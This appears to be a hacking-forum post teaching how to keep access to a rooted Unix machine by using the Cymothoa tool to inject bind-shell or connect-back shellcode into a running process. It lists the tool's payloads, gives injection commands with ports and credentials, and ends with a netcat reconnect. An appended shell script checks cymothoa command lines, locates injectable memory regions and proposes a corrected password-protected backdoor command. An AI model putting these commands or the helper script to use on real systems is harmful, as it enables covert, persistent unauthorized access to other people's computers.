OS BACKDOORS WITH CYMOTHOA

Cymothoa is a stealth backdooring tool that injects a backdoor's shellcode into an existing process. The tool uses the ptrace library (available on nearly all *nix) to manipulate processes and infect them.

DOWNLOAD LINK:
CYMOTHOA

So let's say we just gained access to a Unix system and we are now root on that system. But in the middle of our jumping and screaming for joy we think, "OHH SHIT!! HOW AM I GOING TO KEEP ACCESS??!!!" Well, one, you could just go with the fine and dandy rootkit, but let's say we want something different. Cymothoa is the tool for the job. Very easy to use and stealthy as hell, and with its newest version it can pretty much create a persistent backdoor! So we go ahead and install Cymothoa on the exploited system and begin to make our OS backdoor. First let's take a look at some of Cymothoa's options.


MENU:

Usage:
cymothoa -p <pid> -s <shellcode_number> [options]

Main options:
-p process pid
-s shellcode number
-l memory region name for shellcode injection (default /lib/ld)
search for "r-xp" permissions, see /proc/pid/maps...
-m memory region name for persistent memory (default /lib/ld)
search for "rw-p" permissions, see /proc/pid/maps...
-h print this help screen
-S list available shellcodes

Injection options (overwrite payload flags):
-f fork parent process
-F don't fork parent process
-b create payload thread (probably you need also -F)
-B don't create payload thread
-w pass persistent memory address
-W don't pass persistent memory address
-a use alarm scheduler
-A don't use alarm scheduler
-t use setitimer scheduler
-T don't use setitimer scheduler

Payload arguments:
-j set timer (seconds)
-k set timer (microseconds)
-x set the IP
-y set the port number
-r set the port number 2
-z set the username (4 bytes)
-o set the password (8 bytes)
-c set the script code (ex: "#!/bin/sh\nls; exit 0")
escape codes will not be interpreted..



Well, this tool couldn't get any easier to use. So once it's uploaded and installed, let's do some recon and find a nice process to infect.


[root@localhost cymothoa]# ps -ax


THE COMMAND WILL LIST PROCESSES; FIND ONE THAT MOST LIKELY WILL ALWAYS BE RUNNING!


Okay, once that's done, let's look at some of the payloads Cymothoa gives us:



[root@localhost cymothoa]# cymothoa -S

0 - bind /bin/sh to the provided port (requires -y)
1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <izik@tty64.org>
2 - bind /bin/sh to tcp port with password authentication (requires -y -o)
3 - /bin/sh connect back (requires -x, -y)
4 - tcp socket proxy (requires -x -y -r) - Russell Sanford (xort@tty64.org)
5 - script execution (see the payload), creates a tmp file you must remove
6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/
7 - serial port busybox binding - phar@stonedcoder.org mdavis@ioactive.com
8 - forkbomb (just for fun...) - Kris Katterjohn
9 - open cd-rom loop (follows /dev/cdrom symlink) - izik@tty64.org
10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs (pigspigs@yahoo.com)
11 - POC alarm() scheduled shellcode
12 - POC setitimer() scheduled shellcode
13 - alarm() backdoor (requires -j -y) bind port, fork on accept
14 - setitimer() tail follow (requires -k -x -y) send data via udp


THIS REPRESENTS THE SHELLCODE NUMBER IN THE USAGE MENU!


So let's backdoor this bitch!!! :>



[root@localhost cymothoa]# cymothoa -p 40 -s 0 -y 2012

The command above means that we use shellcode number 0 and inject the process with PID 40, binding to port 2012.


Or let's get tricky with it and add a user and pass:


[root@localhost cymothoa]# cymothoa -p 40 -s 0 -y 2012 -z LEGITimacy -o HackCommunity


And there you go. Nmap the target system and make sure the port is up. Then just netcat to the open port, give your user and pass, and you're back into the system :yeye: Thanks for viewing my thread!
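Added example, not from the post above and not part of the cymothoa project: a POSIX shell pre-flight script that checks a planned cymothoa command line against the usage text and the -S listing quoted in the post before anything is injected, and pulls the r-xp and rw-p regions of the default /lib/ld mapping out of /proc/<pid>/maps (the regions the -l and -m options point at). It encodes only what the help says: which payload arguments each shellcode number requires, the 4-byte limit on -z and 8-byte limit on -o, and that a password (-o) is listed only for shellcode 2. Run against the post's two commands, the first (-p 40 -s 0 -y 2012) passes, while the second is rejected: LEGITimacy is 10 bytes, over the 4-byte -z limit, and -s 0 is the plain bind shell, not the password-authenticated bind (that is -s 2). PID 40 and port 2012 are the post's own values; the /proc maps content in SAMPLE_MAPS is constructed for the example.

```shell
#!/bin/sh
# Pre-flight checks for a cymothoa injection. Added example code; it is not
# part of the original post or of the cymothoa project. Everything it checks
# comes from the usage text and the `cymothoa -S` listing quoted above.

# Payload arguments each shellcode number requires, per `cymothoa -S`.
# Prints the option letters (e.g. "y o" for shellcode 2); fails on unknown numbers.
cymothoa_required_args() {
    case "$1" in
        0|1)                echo "y" ;;
        2)                  echo "y o" ;;
        3)                  echo "x y" ;;
        4)                  echo "x y r" ;;
        13)                 echo "j y" ;;
        14)                 echo "k x y" ;;
        5|6|7|8|9|10|11|12) echo "" ;;
        *)                  return 1 ;;
    esac
}

# Usage: cymothoa_check <pid> <shellcode_number> [rest of the cymothoa command line]
# Returns 0 if the command line satisfies the help text, else prints why and returns 1.
cymothoa_check() {
    pid=$1; sc=$2; shift 2
    case "$pid" in ''|*[!0-9]*) echo "bad pid: '$pid'"; return 1 ;; esac
    req=$(cymothoa_required_args "$sc") || { echo "unknown shellcode number: '$sc'"; return 1; }

    # Collect the payload arguments (-x -y -r -z -o -j -k); injection flags take no value.
    x=''; y=''; r=''; z=''; o=''; j=''; k=''
    while [ $# -gt 0 ]; do
        case "$1" in
            -x|-y|-r|-z|-o|-j|-k)
                [ $# -ge 2 ] || { echo "missing value for $1"; return 1; }
                case "$1" in
                    -x) x=$2 ;; -y) y=$2 ;; -r) r=$2 ;; -z) z=$2 ;;
                    -o) o=$2 ;; -j) j=$2 ;; -k) k=$2 ;;
                esac
                shift 2 ;;
            *)  shift ;;
        esac
    done

    for letter in $req; do
        eval "val=\$$letter"
        [ -n "$val" ] || { echo "shellcode $sc requires -$letter"; return 1; }
    done

    # The help text gives fixed sizes: username 4 bytes, password 8 bytes.
    [ ${#z} -le 4 ] || { echo "-z '$z' is ${#z} bytes, limit is 4"; return 1; }
    [ ${#o} -le 8 ] || { echo "-o '$o' is ${#o} bytes, limit is 8"; return 1; }
    if [ -n "$z$o" ] && [ "$sc" != 2 ]; then
        echo "note: only shellcode 2 lists a password (-o); shellcode $sc is not listed as using -z/-o" >&2
    fi

    # -y and -r are TCP ports.
    for p in "$y" "$r"; do
        [ -n "$p" ] || continue
        case "$p" in *[!0-9]*) echo "bad port: '$p'"; return 1 ;; esac
        if [ "$p" -lt 1 ] || [ "$p" -gt 65535 ]; then
            echo "port out of range: $p"; return 1
        fi
    done
    return 0
}

# Usage: maps_find_region <name> <perms>  < /proc/<pid>/maps
# Prints the address range of the first mapping whose path contains <name> and
# whose permissions are exactly <perms> (r-xp for -l, rw-p for -m); prints nothing if none.
maps_find_region() {
    awk -v name="$1" -v perms="$2" \
        'NF >= 6 && $2 == perms && index($6, name) > 0 { print $1; exit }'
}

# Constructed sample of /proc/<pid>/maps (not captured from a real host).
SAMPLE_MAPS='00400000-0040b000 r-xp 00000000 08:01 131089 /bin/sleep
0060a000-0060b000 rw-p 0000a000 08:01 131089 /bin/sleep
7f1b3c400000-7f1b3c420000 r-xp 00000000 08:01 262311 /lib/ld-2.13.so
7f1b3c61f000-7f1b3c620000 r--p 0001f000 08:01 262311 /lib/ld-2.13.so
7f1b3c620000-7f1b3c621000 rw-p 00020000 08:01 262311 /lib/ld-2.13.so
7fff5a3e0000-7fff5a401000 rw-p 00000000 00:00 0 [stack]'

# Demonstration on the post's two command lines (PID 40 and port 2012 are the
# post's values; a real run reads /proc/40/maps instead of SAMPLE_MAPS).
echo "r-xp region for -l: $(printf '%s\n' "$SAMPLE_MAPS" | maps_find_region /lib/ld r-xp)"
echo "rw-p region for -m: $(printf '%s\n' "$SAMPLE_MAPS" | maps_find_region /lib/ld rw-p)"
cymothoa_check 40 0 -y 2012 && echo "ok: cymothoa -p 40 -s 0 -y 2012"
cymothoa_check 40 0 -y 2012 -z LEGITimacy -o HackCommunity || echo "rejected: second command from the post"
```

On a live target, feed the real maps file (`maps_find_region /lib/ld r-xp < /proc/40/maps`) to confirm the process actually has the mapping cymothoa defaults to; an empty result means -l/-m need a different region name. The password-authenticated bind the post is after is shellcode 2 with an -o of at most 8 bytes, e.g. `cymothoa -p 40 -s 2 -y 2012 -o Hack1234`, which the checker accepts.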





OS BACKDOORS WITH CYMOTHOA - by LEGITimacy™ - 01-21-2013, 08:07 AM